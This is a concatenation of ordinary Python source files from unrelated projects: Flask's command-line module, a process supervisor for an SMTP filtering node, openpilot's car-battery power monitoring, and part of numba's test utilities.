'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
'be called with the specified arguments.'.format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
'A valid Flask application was not obtained from '
'"{module}:{app_name}".'.format(
module=module.__name__, app_name=app_name
)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == '.py':
path = os.path.splitext(path)[0]
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
'\n\n{tb}'.format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException(
'Could not import "{name}".'.format(name=module_name)
)
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(
['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get('FLASK_APP')
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(':', 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ('wsgi.py', 'app.py'):
import_name = prepare_import(path)
app = locate_app(self, import_name, None,
raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
'Could not locate a Flask application. You did not provide '
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
debug = get_debug_flag()
# Update the app's debug flag through the descriptor so that other
# values repopulate as well.
if debug is not None:
app.debug = debug
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, load_dotenv=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ['FLASK_RUN_FROM_CLI'] = 'true'
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path):].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.exists('.env') or os.path.exists('.flaskenv'):
click.secho(
' * Tip: There are .env files present.'
' Do "pip install python-dotenv" to use them.',
fg='yellow')
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in ('.env', '.flaskenv'):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += ' (lazy loading)'
click.echo(message)
click.echo(' * Environment: {0}'.format(env))
if env == 'production':
click.secho(
' WARNING: Do not use the development server in a production'
' environment.', fg='red')
click.secho(' Use a production WSGI server instead.', dim=True)
if debug is not None:
click.echo(' * Debug mode: {0}'.format('on' if debug else 'off'))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = 'path'
def __init__(self):
self.path_type = click.Path(
exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == 'adhoc':
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
'Using ad-hoc certificates requires pyOpenSSL.',
ctx, param)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get('cert')
is_adhoc = cert == 'adhoc'
if sys.version_info < (2, 7):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.',
ctx, param)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.',
ctx, param)
if not cert:
raise click.BadParameter(
'"--cert" must also be specified.',
ctx, param)
ctx.params['cert'] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter(
'Required when using "--cert".',
ctx, param)
return value
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--cert', type=CertParamType(),
help='Specify a certificate file to use HTTPS.')
@click.option('--key',
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key, expose_value=False,
help='The key file to use when specifying a certificate.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=True,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(host, port, app, use_reloader=reload, use_debugger=debugger,
threaded=with_threads, ssl_context=cert)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s [%s]\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command('routes', short_help='Show the routes for the app.')
@click.option(
'--sort', '-s',
type=click.Choice(('endpoint', 'methods', 'rule', 'match')),
default='endpoint',
help=(
'Method to sort routes by. "match" is the order that Flask will match '
'routes when dispatching a request.'
)
)
@click.option(
'--all-methods',
is_flag=True,
help="Show HEAD and OPTIONS methods."
)
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo('No routes were registered.')
return
ignored_methods = set(() if all_methods else ('HEAD', 'OPTIONS'))
if sort in ('endpoint', 'rule'):
rules = sorted(rules, key=attrgetter(sort))
elif sort == 'methods':
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [
', '.join(sorted(rule.methods - ignored_methods)) for rule in rules
]
headers = ('Endpoint', 'Methods', 'Rule')
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = '{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}'.format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*('-' * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd='export' if os.name == 'posix' else 'set',
prefix='$ ' if os.name == 'posix' else '> '
))
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = 'flask'
if sys.version_info < (2, 7):
this_module += '.cli'
name = 'python -m ' + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ['-m', this_module] + args
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
main.py | import os
from multiprocessing import Process, shared_memory
from time import sleep
from loguru import logger
from initialization_system.rabbitmq import START_RABBITMQ
from initialization_system.tarantool import START_TARANTOOL
from configuration_manager.configuration_manager import CONFIGURATION_MANAGER
from system.other import GET_CONF_FROM_MEM
from system.cleaner_manager import CLEANER_MANAGER
from system.queue_manager import QUEUE_MANAGER
from smtp_dem.smtp_dem import SMTP_DEM
from smtp_an.smtp_an import SMTP_AN
MAX_MEM_FOR_CONF = 16384 # Max byte size for data configuration
log_name = "/var/log/skyleaf.log"
if "LOG_NAME" in os.environ:
log_name = os.environ['LOG_NAME']
logger.add(log_name,
format="{time} {level} {message}",
level="DEBUG",
rotation="10 MB",
compression="zip")
if __name__ == "__main__":
""" INITILIZATION """
logger.info("Starting initilization.")
"""
while True:
print("!")
sleep(40)
"""
if not START_TARANTOOL():
logger.error("Tarantool is not started.")
exit(1)
if not START_RABBITMQ():
logger.error("Rabbitmq is not started.")
exit(1)
""" Getting configuration """
j_config = {'version': 0}
shm = shared_memory.SharedMemory(create=True, size=MAX_MEM_FOR_CONF)
address_in_mem = shm.name
logger.info("Starting configuration manager.")
p_conf = Process(target=CONFIGURATION_MANAGER, args=[address_in_mem, MAX_MEM_FOR_CONF])
p_conf.start()
sleep(10)
while True:
j_config = GET_CONF_FROM_MEM(address_in_mem)
if j_config['version'] != 0:
logger.info("Upload configuration successfully")
break
sleep(10)
""" Start cleaner manager """
logger.info("Starting cleaner manager.")
cleaner_m = Process(target=CLEANER_MANAGER, args=[address_in_mem,])
cleaner_m.start()
""" Start queue manager """
logger.info("Starting queue manager.")
queue_m = Process(target=QUEUE_MANAGER, args=[address_in_mem,])
queue_m.start()
""" Start smtpd server """
logger.info("Starting smtpd server.")
smtpd_server = Process(target=SMTP_DEM, args=[address_in_mem,])
smtpd_server.start()
""" Start smtp senders """
logger.info("Starting smtp senders.")
proc_active_children = []
for num in range(j_config['system']['max_active_workers']):
sender = Process(target=SMTP_AN, args=[address_in_mem,])
sender.start()
proc_active_children.append(sender)
""" MONITORIN """
logger.info("Filtration node is ready!")
while True:
sleep(10)
if p_conf.is_alive() is not True:
logger.info("Starting configuration manager again.")
p_conf = Process(target=CONFIGURATION_MANAGER, args=[address_in_mem,])
p_conf.start()
if cleaner_m.is_alive() is not True:
logger.info("Starting cleaner manager again.")
cleaner_m = Process(target=CLEANER_MANAGER, args=[address_in_mem,])
cleaner_m.start()
if queue_m.is_alive() is not True:
logger.info("Starting queue manager again.")
queue_m = Process(target=QUEUE_MANAGER, args=[address_in_mem,])
queue_m.start()
if smtpd_server.is_alive() is not True:
logger.info("Starting smtpd server again.")
smtpd_server = Process(target=SMTP_DEM, args=[address_in_mem,])
smtpd_server.start()
for i in range(len(proc_active_children)):
if proc_active_children[i].is_alive() is not True:
logger.info("Starting smtp senders again.")
sender = Process(target=SMTP_AN, args=[address_in_mem,])
sender.start()
proc_active_children[i] = sender
|
power_monitoring.py | import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen, LEON):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10 if LEON else 3
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
|
support.py | """
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
import numpy as np
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,), (utils.text_type), ]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
